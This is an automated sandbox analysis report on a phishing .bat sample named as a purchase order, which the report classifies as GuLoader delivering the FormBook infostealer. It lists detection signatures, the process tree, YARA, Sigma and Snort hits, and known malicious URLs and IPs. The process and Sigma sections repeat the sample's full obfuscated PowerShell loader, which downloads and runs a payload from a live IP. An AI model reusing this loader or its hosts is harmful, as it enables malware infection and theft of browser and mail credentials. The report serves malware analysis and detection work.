Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_La-Tanerie04180240124.bat

Overview

General Information

Sample name:PO_La-Tanerie04180240124.bat
Analysis ID:1430938
MD5:dd4839ecc1b0a5b2f98415fe36f4e848
SHA1:20389c69b3069faafc09c4adf7d98b9f36f305f9
SHA256:7c9bff4d76e487e274fe0f7a323f55d6c74de2a809f1c646a2dbad3417c3229f
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3124 cmdline: powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 7700 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2316 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5440 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7348 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • RAVCpl64.exe (PID: 7544 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
            • AtBroker.exe (PID: 5904 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
              • TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe (PID: 7072 cmdline: "C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 7912 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • wab.exe (PID: 5804 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6896 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 4408 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x78d56:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x62ab5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b720:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1547f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        amsi32_2316.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xd287:$b2: ::FromBase64String(
        • 0xc368:$s1: -join
        • 0x5b14:$s4: +=
        • 0x5bd6:$s4: +=
        • 0x9dfd:$s4: +=
        • 0xbf1a:$s4: +=
        • 0xc204:$s4: +=
        • 0xc34a:$s4: +=
        • 0x15758:$s4: +=
        • 0x157d8:$s4: +=
        • 0x1589e:$s4: +=
        • 0x1591e:$s4: +=
        • 0x15af4:$s4: +=
        • 0x15b78:$s4: +=
        • 0xcb31:$e4: Get-WmiObject
        • 0xcd20:$e4: Get-Process
        • 0xcd78:$e4: Start-Process
        • 0x14265:$e4: Get-Process

        System Summary

        barindex
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s, CommandLine: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s, CommandLine|base64offset|contains: , Image: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, NewProcessName: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, OriginalFileName: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7348, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s, ProcessId: 7544, ProcessName: RAVCpl64.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\AtBroker.exe, ProcessId: 5904, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\S2U4LH
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;", CommandLine: powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;Fo
        Timestamp:04/24/24-11:57:58.501990
        SID:2855465
        Source Port:50316
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-11:58:54.980178
        SID:2855465
        Source Port:50322
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-11:58:49.607288
        SID:2855464
        Source Port:50320
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-11:58:46.928010
        SID:2855464
        Source Port:50319
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.png4Avira URL Cloud: Label: malware
        Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
        Source: http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9Avira URL Cloud: Label: malware
        Source: http://pesterbdd.com/images/Pester.pngXzAvira URL Cloud: Label: malware
        Source: www.oyoing.comVirustotal: Detection: 9%Perma Link
        Source: www.tyaer.comVirustotal: Detection: 10%Perma Link
        Source: http://87.121.105.163/Licences.ttfVirustotal: Detection: 7%Perma Link
        Source: http://87.121.105.163/vhhJQWfiJN142.binVirustotal: Detection: 14%Perma Link
        Source: http://87.121.105.163Virustotal: Detection: 18%Perma Link
        Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
        Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 13%Perma Link
        Source: http://pesterbdd.com/images/Pester.pngXzVirustotal: Detection: 9%Perma Link
        Source: Yara matchFile source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Binary string: System.Configuration.Install.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Data.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 0000000A.00000002.20243445512.000000006A10D000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: indows\System.Core.pdbRm source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C58000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.DirectoryServices.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
        Source: Binary string: System.Data.ni.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl@ source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
        Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
        Source: Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
        Source: Binary string: System.Management.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: System.Management.ni.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
        Source: Binary string: System.Numerics.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02ABD1C0 FindFirstFileW,FindNextFileW,FindClose,15_2_02ABD1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h14_2_06E6179E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then pop ebx15_2_02AB3070
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then xor eax, eax15_2_02AAAE40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then pop ebx15_2_02AB306F

        Networking

        barindex
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50316 -> 47.91.88.207:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50319 -> 172.67.152.117:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50320 -> 172.67.152.117:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50322 -> 172.67.152.117:80
        Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
        Source: Joe Sandbox ViewIP Address: 47.91.88.207 47.91.88.207
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
